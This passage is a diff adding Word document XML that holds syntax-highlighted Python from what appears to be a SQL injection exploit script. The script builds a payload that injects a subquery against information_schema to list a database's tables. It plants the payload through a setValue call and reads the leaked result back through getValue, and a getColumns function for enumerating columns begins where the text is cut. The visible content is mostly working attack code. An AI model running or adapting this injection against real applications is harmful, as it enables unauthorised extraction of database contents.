+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>','pw', (SELECT group_concat(table_name) FROM information_schema.columns WHERE table_schema='</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>' LIMIT 1)); -- -"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>setValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getValue</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>split</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>','</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>list</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>set</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t># Get columns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>getColumns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
